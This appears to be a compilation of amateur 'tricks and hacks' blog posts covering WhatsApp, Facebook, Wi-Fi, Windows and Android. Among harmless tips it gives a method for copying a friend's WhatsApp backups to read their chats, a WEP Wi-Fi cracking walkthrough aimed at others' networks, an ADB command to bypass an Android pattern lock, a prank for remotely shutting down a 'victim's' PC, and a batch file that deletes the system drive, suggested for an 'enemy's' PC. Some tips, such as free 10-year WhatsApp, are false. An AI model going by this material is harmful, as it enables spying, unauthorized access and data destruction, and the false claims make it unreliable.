How To Get 10 years Subscription of WHATSAPP

GET WHATS APP SUBSCRIPTION FOR 10 YEAR

All of u know now whatsapp is developed one most part of our life. It is community but when we download it or create account it free for 1 years. After this we should pay it some money.
But from that trick u will get it for 10 with no extra charge that means free. For that carefully follow below steps.

Steps:--

1. First, Delete your WhatsApp Account
from your Phone.

2. Now you will need to look for a Friend or Anyone who has Apple Iphone or Ipad Any Version

3. Then you need to Register WhatsApp with your Number on his Iphone or Ipad.

4. Now After entering you Number on Iphone/Ipad, you will get a Verification code on your Mobile, Just Check your inbox, and Enter the Verification code on Iphone/Ipad

5. After these Steps WhatsApp will load and Start on Iphone, just Check WhatsApp Account and it will have Paid Subscription till 2024.

Now Final step Delete your Account from the Iphone/Ipad. and Simply
download WhatsApp on Any Device
which supports it and Enter your Number then verify It. you will see you have got 10 Years of WhatsApp Free.

How To Run Games Without Graphics Card

Hello everyone, i have recenty posted
about how to increse Ram using USB/
Pendrive. Now as i told in my recent post that i will give you tutorial on how to run games without graphics card so thats here. Using this tutorial you will able to run high end games on low-end computer easily without having good graphics card. I am sure many of you facing this graphics card problem. As we with the advancement in technology my people are unable to run games. So, is there any need to buy new Pc/Laptop or
graphics card to run games? Well no,
by using the below method you can
run games which requires graphics
card.
Lets start here:-

How To Run/play Games Without
Graphics Card :-

Using 3D-Analyze :-

3D Analyze is a powerful application
that allows to play many DirectX based games using video hardware officially unsupported and unable to run these.With it you can optimize efficiency, above all if your CPU will permit, although still with a low range card. This program supports Direct3D as much as OpenGL, whichever it may be to optimize your system.Now I'will show you how to
install and configure 3D-Analyze main
settings to play gamesfor this just follow the following steps:-

Step 1: First of all download the 3D
analyze .
Step 2: Now install and run the 3D
analyze.
Step 3: Now click on select option as
below and then a window opens where
you have to select the exe file of the
game which you wants to
run.
Step 4: Now you can see names,
vendorID and deviceID of different
graphics cards. Select any one of
them and enter the VendorID and
DeviceID in the column at the left
side.
Step 5: Just click on Run button and
Enjoy !!

Using SwiftShader :-

SwiftShader’s modular architecture is
capable of supporting multiple application programming interfaces,
such as DirectX® 9.0, and OpenGL®
ES 2.0, the same APIs that developers are already using for existing games and
applications. SwiftShader can therefore be directly integrated into applications
without any changes to source code.It is also similar to 3D analyze.

Step 1: First of all download the
SwiftShader.
Download Swiftshader 3.0 for x86bits
Download Swiftshader 3.0 for x64bits
Step 2: Now extract the zip file of
SwiftShader.
Step 3: Now copy d3d9.dll file from
the extracted folder.
Step 4: Paste the d3d9.dll file to the
game's directory.
Step 5: Just click on exe file of your
game where you placed the d3d9.dll
file and Enjoy !!

How to Find Facebook Fake Friends

Fake Facebook Accounts Finder

A lot of people make fake accounts on social networking site Facebook, which has caused growing cyber crime cases. An Israel-based start-up has developed an application, FakeOff, that helps to identify fake accounts on Facebook.

Eliran Shachar said that recent figures show that nearly less than 10 percent of 1.35 billion Facebook users are not reliable. In addition, there are millions of consumers who create fake accounts. Fake profiles are divided into several groups, including criminal, commercial
and psychological etc.

FakeOff is being used for two months and so far over 15,000 people have joined the list of those who use it. Most bogus accounts in India and Turkey, Shachar said this app probing passing from 24 per cent were found to be fake profiles. Facebook has said that nearly 143 million accounts on its platform can be forged or fake. Most of these are developing countries such as India and
Turkey.

According to Shachar 'Fakeoff' app on
Facebook using sophisticated calculation system gestures of friendship suspects who understands and gives them points from 1 to 10. Facebook Friend of every suspicious
activities around 365 days on the timeline and unusual activities pours senses.

How to Make Search Engines Catch You?

How user behavior affect search engine ranking results is a lot of SEO have been concerned about exploring. Stone at the point a little while ago on the forum to see a lot on the Baidu search results, click on their website, which further improve the ranking discussion. The logic is that the search results a website is more clicks, indicating that the more useful and more users prefer, search engines will further improve the site's ranking. However, this user behavior data is very noisy, very easy to cheat. Search engines want to extract the essence of these data is very difficult.

A few days ago Google employees JohnMu in Google Help forum clearly says , such as clicking on a web site and then immediately point back button, this operation does not affect your site's crawling, indexing and ranking. It's
too easy to cheat, too easy to use by
competitors. This seems like great value, but difficult to extract data also a lot of useful information. Such as bulk spam links to competitors' sites. In the final analysis, to effectively utilize user behavior data, the key lies in how search engines confirm user identity, that accurately identify the specific behavior in the end who did it. If a large number of real users click on your website, stay a very long time, then the ranking certainly beneficial. If the search engines can determine that much of what you click on a person, or a group of people related to you dry, may the opposite effect.

Mass to the opponent, too, the key is who is mass discrimination. I wrote an undetected , more sci-fi and imagining belong. But who would dare to affirm that one day, in the online identity will not be judged by gene to achieve it?
20 years ago, if anyone told me there is Internet, there website, there will be SEO , then I would think it is science fiction. In fact, search engines now have mastered a lot of data that can help
identify user identity. Such as Google can, through cookies, JS script, toolbar, gmail account, Adsense account, Google Analytics account, IP address, user search data such determination and identification of user identity.

1:

If a user logged in gmail account, and then access any with Adsense, Google Analytics , and Google can control any JS script pages, these access data will be recorded. And with Google JS script plethora site right now, aside from the
obvious Adsense, Google Analytics, and now Google has acquired the largest online advertising company DoubleClick, numerous sites have ads all use Google's code. So your every move on the Internet, it is difficult to escape the eyes of Google. If you installed the
Google Toolbar , you visit the site situation is even more clear.

Even if you can extreme abstinence, without a trace, neither any Google Account login, the browser off JS script functions, they do not toolbars. In short you are a ninja who is still no guarantee that search engines can not find me.
For example, if you pass an alliance trading links , this is Google hate thing. Even if you can do stealth, but you can not guarantee this league other people can trace. If this link trading alliance which exposed the identity of some of
the people, and these people look at your site from time to time visit to check they are buying links, your website and your own also revealed the secret.

How To Watch Youtube Video Faster Without Buffering

Let get start :

1. Go to start
2. Type in CMD(Run as
Administrator)
3. Paste this to the
command box : netsh
advfirewall firewall add
rule
name="MITCHRIBA
RYTUBE" dir=in
action=block
4. Hit Enter
5. Enjoy!!!

After you done this go and test it by watching your favorite video on After you done this go and test it by watching your favorite video on youtube

How To Hack Your Friend's Whatsapp

You can easily snatch the .crypt files from your friends SD Card and then view them online using the RecoverMessages website.
1. Just try to explore the friends SD Card
and navigate to SD Card > Whatsapp >
Database folder.
2. Here you will two files -msgstore-
yyyy..dd..db.crypt which will exactly
contain date and year when the backup
was created.
3. Simply copy this files to your computer and then upload this file to
“RecoverMesages.com” to view them
online.
That’s it now you have easily hacked your friends Whatsapp Database, now you can view all the conversation and even ask him about his or her crush ;p, so guys this how hacking Whatsapp conversation works, so enjoy.

How to transfer balance from one mobile to another

Sometimes, we need to transfer balance
from our mobile to a family member or
friend’s mobile etc. Here are some tricks
which may help you to transfer balance
from one mobile number to another on but, on same network .

Transfer balance in Aircel mobile number

Type *122*666# and hit call button >
Select the amount to transfer>
Enter Mobile number to transfer balance,
Done.

Transfer balance in Tata Docomo mobile number

( Sorry, Tata Docomo isn’t providing
balance transfer service now. )

Type>>BT<space>MobileNumber<space> amount and send it to >> 54321

Transfer balance in Vodafone mobile number

Send:
TRAN (amount u want to transfer)
(phone number of your friend)
to
144(tol free)
or
Dial>>
*131*20*<phone number>#
& press call button

Transfer balance in BSNL network

Just send sms as
GIFT<space>mobile number and send it
to>> 53733
You are able to gift Rs. 50 only.

Transfer balance in Airtel number

Dial>>
*143*<phone number>#
& press call button u can transfer Rs.50

Transfer balance in idea mobile no.

Dial>>
*567*<phone number>*Rs#

Transfer balance in Uninor Mobile

Dial this Code on your phone *202*Mobile
Number*Amount#
e.g.Dial *202*9717754146*50# to transfer
Rs.50 .

Transfer balance in Reliance GSM Mobile

Dial *367*3# then press ok or *312*3# and
mobile (mdn) number
Now enter amount you want to transfer
Enter the pin default pin is 1
How to transfer balance from one mobile to another

How to remove hidden virus from your pendrive

It is a common problem that your pendrive is infected with some viruses .This problem is not for you, i have also faced this problem many times. You know very well that it is very difficult to remove virus from pendrives .It is few chances that your antivirus detected some viruses in your pendrive and deleted them . I used many scanners but i don ’ t know why they are not finding the viruses .

If you are facing the shortcut virus:

This virus is very popular. it attacks on those files which are present in the
pendrive.Whenever we send files to our pen drive, those big files are converted into shortcuts but the memory taken is same as the size of sent file .

How to recover files from such pendrives :

1. Open control panel

2. From folder option have to select the option of show hidden files and folders .
Now open your pendrive to view original fies . Actually this was very easy but i know you want a permanent remedy for these viruses .

So guys i am going to guide you in steps using which you can easily delete or remove all the viruses from your pendrive .

Procedure to delete virus:

1. Connect the infected pendrive to the
computer.

2. Go to start >> Run Box or press start key+R

3. Type cmd in Runbox .

4. Type c : \> h ( h is the letter of your pendrive) .

5. Now type attrib -s - h *_* /s /d and press enter key .

After this you can easily view the hidden files ( viruses ) present in your pendrive .
Next step is just easy to delete those viruses manually.

I hope this work for you, i have also used this trick to clean many of pendrives .

Pirate Laguage on Facebook

Awesome Trick...
I Like it...
Try it..

Friends Did you know guys that you can set your language on facebook
to 'Pirate' !!! The ''Like-Button'' is named
''Arr!!''
Try it out Just set your language to 'English (Pirate)'
HAVE FUN!!!

Turn your laptop into a wireless hotspot

You are using LAN or single ethernet
connection and not able to share your network to any one,even on your own mobile .You can share your internet connection by making a wireless hotspot with the help of various
applications like virtual router etc but it would be great if you could share your internet connection without any software and hardware . Well , you are at right place if you are really searching such trick to create a wireless hotspot.

Steps to make a wireless hotspot on
your pc / laptop :

1. First of all you have to run cmd as an
administrator by searching it in all
programs >> Accessories> cmd .

2. Now type netsh wlan set hostednetwork mode=allow ssid =hackerzeye key =hackerzeye

3. Now open control panel >>View network status and tasks .

4. Here you have to click on ‘ change adapter settings‘ .

5. Right click on the second network and go to its properties .Under ‘ sharing‘ tab you have to allow both options and save these settings .

6. Now again move to cmd and type netsh wlan start hosted network

All is done now . Search this network from your mobile devices and connect it with password 'Hacking Mode Activated'

Create A Undeletable And Unrenamable Folders In Windows

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system . Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

1. Go to Start and then Click on Run
2. Type cmd & hit enter ( To open Command Prompt ).
3. Remember you cannot create Undeletable & unrenamable folder in your rootdirectory (i.e. where the windows is installed) That means
you can't make this kind of folder in C: drive if you installed windows on C:
4. Type D: or E: and hit enter
5. Type md con\ and hit enter (md -
make directory)
6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
7. Open that directory, you will see the folder created of name con.
8. Try to delete that folder or rename that folder windows will show the error message .

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.

1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter
3. Type rd con\ (rd - remove directory)
4. Open that directory and the folder will not appear because it is removed.

HOW TO SHUT DOWN YOUR FRIENDS COMPUTER THROUGH CHATING

You can shutdown your friend's computer through chating. This is very simple and cool trick.

Kindly follow these steps :-

Step 1: Before going to start clear all history, all cookies, stop all downloading and close all extra tabs. Mean to say stop all internet activities.
Now go to your messanger and start chating with the victim.

Step 2: Go the start and click on run.

Step 3: In run command type cmd.exe and hit enter.

Step 4: A black screen will appear. This is command prompt. In this box type "netstat - n" (without quotes).

Step 5: Now if you done the step one correctly you see only one ip address many times (ip should be of victim).

Step 6: Now again, type "shutdown -i"(without quotes).A box will appear now click on add button.A small box will pop up. Now type ip address of computer which you get from "netstat - n" command.

Step 7: Now there are three options click on shutdown.

Step 8: To show a message to victim's computer check the "warm users of the action" and set the number of
seconds.

Step 9: Now select any option in shutdown event tracker.

Step 10: Now comes the best part of the prank.
In last type your message like you got hacked and we destroy your computer. After this shutdown your computer is not going to start (type anything
that scare your victim).

Now click on ok and you are done.

FOR EDUCATIONAL PURPOSES ONLY

How To Use 2 Profile Pictures in One Facebook ID

Hey Guys Today i am
going to share a new
trick.
From This Trick You Can
Use Two Different
Profile Picture in Facebook !
How To Use Two
Different Profile Picture in
Facebook

Steps:-
1. Open Your
Profile Picture Album and
then that picture you
want to use as another
profile picture

2. Open that picture then
copy the FB ID of that
Picture .

3. Now Go To Your
Timeline and hover your
mouse to your current
profile picture and right
click on it then select edit
thumbnail .

4. Now A popup box will
open right click on your
current profile pic and
select inspect element

5. Now Scroll Down Until
You Find " <form action=”
https://
upload.facebook. com /
save_square_pic. php
Then Double Click on it to
expand the Code

6. Now Scroll down a bit,
you will find <input
type=”hidden”
autocomplete=”o ff”
name=”photo_fbi d”
value=”36264344
7178260“>
Now Replace the Current
FBID value with the
which you have copied
earlier

7. Now Click AnyWhere
and exit the inspect
element and click on
save.
Done

How To Open Banned Websites WIth Proxy Sites ?

There are many sites  which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by malware, virus. Today i will share a trick  with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy  server which is faster and trusted. Here in this post I am revealing an online proxy  and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.

How To Open Banned Site ?

1. Open www.incloak.com  in your browser. You can also use any proxy site

2. After that enter the URL of the site which you want to open

3. Now click the Hide Me button and enjoy.

Download Youtube Videos Without Any Software

This is simple youtube trick which will allow you to download any youtube videos without any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.

How To Download Youtube Videos ?

1. First Go to Youtube Homepage .

2. Then select the video you want to download. I will demonstrate with video url given below.

http://www.youtube.com/
watch?v=_JAa3NvP6f4

3.Now add save or ss or kick
before youtube and press
enter.

4. After adding any of the above keyword the above link will become.

http://
www. save youtube.com/
watch?v=_JAa3NvP6f4
Or
http://www. ss youtube.com/
watch?v=_JAa3NvP6f4
Or
http://www. kick youtube.com/
watch?v=_JAa3NvP6f4

5. Now you will be redirected to a new page from where you can download youtube videos  in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

How to Crack Wi-Fi Passwords—For Beginners!

An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere!
If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key.
Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down.
Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.

Table of Contents
1.      How are Wireless networks secured?
2.      What you'll need
3.      Setting up CommView for Wi-Fi
4.      Selecting the target network and capturing packets
5.      Waiting...
6.      Now the interesting part... CRACKING!
Are you a visual learner?
How Are Wireless Networks Secured?
In a secured wireless connection, internet data is sent in the form of encrypted packets. These packets are encrypted with network security keys. If you somehow manage to get hold of the key for a particular wireless network you virtually have access to the wireless internet connection
Broadly speaking there are two main types of encryptions used:
WEP (Wired Equivalent Privacy):
This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
WPA (Wi-Fi Protected Access):
This is the more secure alternative. Efficient cracking of the passphrase of such a network requires the use of a wordlist with the common passwords. In other words you use the old fashioned method of trial and error to gain access. Variations include WPA-2 which is the most secure encryption alternative till date. Although this can also be cracked using a wordlist if the password is common, this is virtually uncrackable with a strong password. That is, unless the WPA PIN is still enabled (as is the default on many routers).
Hacking WEP passwords is relatively fast, so we'll focus on how to crack them for this guide. If the only networks around you use WPA passwords, you'll want to follow this guide on how to crack WPA WiFi passwords instead.
What You'll Need...
·         A compatible wireless adapter:
This is by far the biggest requirement.The wireless card of your computer has to be compatible with the software CommVIew. This ensures that the wireless card can go into monitor mode which is essential for capturing packets.Click here to check if your wireless card is compatible
·         CommView for Wi-Fi :
This software will be used to capture the packets from the desired network adapter.Click here and download the software from the website.
·         Aircrack-ng GUI:
After capturing the packets this software does the actual cracking.Click here-Click here and download the software from the website.
·         A little patience is vital!!
Step 1: Setting Up CommView for Wi-Fi
·         Download the zip file of CommView for Wi-Fi from the website. Extract the file and run setup.exe to install CommView for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
·         Run CommView for Wi-Fi.
·         Click the play icon on the top left of the application window.
Start scanning for wireless networks.
CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network
Step 2: Selecting the Target Network and Capturing Packets
A few things to keep in mind before choosing the target wireless network
·         This tutorial is only for WEP encrypted networks.
So make sure you select a network with WEP next to its name
·         Choose a network with the highest signal.
·         Each network will have its details in the right column.
·         Make sure the WEP network you are choosing has the least the least dB (decibel) value.
Once you have chosen your target network,select it and click Capture to start capturing packets from the desired channel.
Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
·         Right click the desired network and click on copy MAC Address.
·         Switch to the Rules tab on the top.
·         On the left hand side choose MAC Addresses
·         Enable MAC Address rules
·         For 'Action' select 'capture' and for 'Add record' select 'both'.
·         Now paste the mac address copied earlier in the box below.
We need to capture only data packets for cracking. Hence select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets).
Now you have to save the packets so that they can be cracked later. To do this-
·         Go to the logging tab on top and enable auto saving.
·         Set Maximum Directory Size to 2000
·         Set Average Log File Size to 20.
Step 3: Waiting...
Now the boring part- WAITING!
NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal.
After you think you have enough packets (at least 100,000 packets)
·         Go to the log tab and click on concatenate logs.
·         Select all the logs that have been saved.
·         Do not close CommView for Wi-Fi
·         Now navigate to the folder where the concatenated logs have been saved
·         Open the log file
·         Select File- Export -Wire shark tcpdump format and choose any suitable destination.
This will save the logs with a .cap extension to that location
Now the Interesting Part... CRACKING!
·         Download Aircrack-ng and extract the zip file.
·         Open the folder and navigate to 'bin'.
·         Run Aircrack-ng GUI
·         Choose WEP
·         Open your .cap file that you had saved earlier.
·         Click Launch.
·         In the command prompt type in the index number of your target wireless network.
·         Wait for a while .If everything goes fine the wireless key will be shown.
You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets
BEST OF LUCK

Use Or Surf Internet Without Any Browser


Ever find yourself sitting in front
of a computer where Internet
Explorer or Firefox was blocked
by IT Administrator, and restricted
you from installing any software?
If that PC is running Windows
XP, then there is chance for you to
still surf Internet.

Just follow these simple steps:

1. Open Calculator, Start> Program
Files> Accessories> Calculator.

2. In Calculator, go to Help> Help
Topics.

3. Right click on the left hand side
of the title bar and click on 'Jump
to URL'.

4. Type in the URL and make sure
include the 'http://' at the
beginning.



Bypass Android Pattern Lockscreen using CMD (No Root & No Third-party App)


WARNING:
Try at your own risk.


Note*:

1.Make sure that your computer is set up with ADB (Android SDK) incase you don't have the ADB or don't know how to set it up search in google nd youtube.

2. Make sure that your Android device setting for "USB Debugging" is ENABLED or active.

Home>Apps>Settings>Developers options>USB debugging> check the box to enable

3. Make sure that your computer is equipped with necessary drivers and use your native USB cable.


FOLLOW this steps:

1. Plug-in your device to your PC using your USB cable (works on Windows, Mac and Linux). Make sure that you have an active pattern screenlock.

2. On your PC click on START / SEARCH / RUN and type "cmd" to launch the Command Prompt

3. On the cmd window type in "adb shell" (no quotation marks) then hit enter.

4. After entering type "rm /data/system/gesture.key" (no quotation marks) then hit enter.

5. After the process you need to "REBOOT" your Android device (without unplugging it to your PC).

6. After your phone fires up unplug it to your PC then your good to go... CONGRATULATIONS you successfully bypassed your Pattern Lock Screen, your phone now will accept any pattern you will draw on the lock screen as VALID and CORRECT.

Now if you're thinking that your phone's lock screen is not working properly. You can create a new Pattern password as normal as you did before the process like nothings happend. This will not hurt your phone's functions if you follow the steps.

To create Pattern Password just go to:

Home>Apps>Settings>Security>Screen lock>Pattern (4.0.3 Ice Cream Sandwich)
Home>Apps>Settings>Lock screen>Pattern (4.1.2 Jelly Bean)

Simple Virus That Destroy Your pc


simple virus that destroys a PC
A funny PC trick to prank your friends
It is a simple virus which can't detect by any antivirus.

first, Type this in your notepad:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@Echo off
Del C:\ *.*
y
or better version
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And save that as .bat and RUN IT
It will delete the content of C:\
drive...........!
PLEASE NoTe: don't run that .bat
file on your system .............. it
will delete your C:/ drive.
Even i didn't try this.
you can try and run this on your
waste old PC's.......!
OR
in your friend's or enemy's PC's.
( be responsibility of your friends)

Follow Us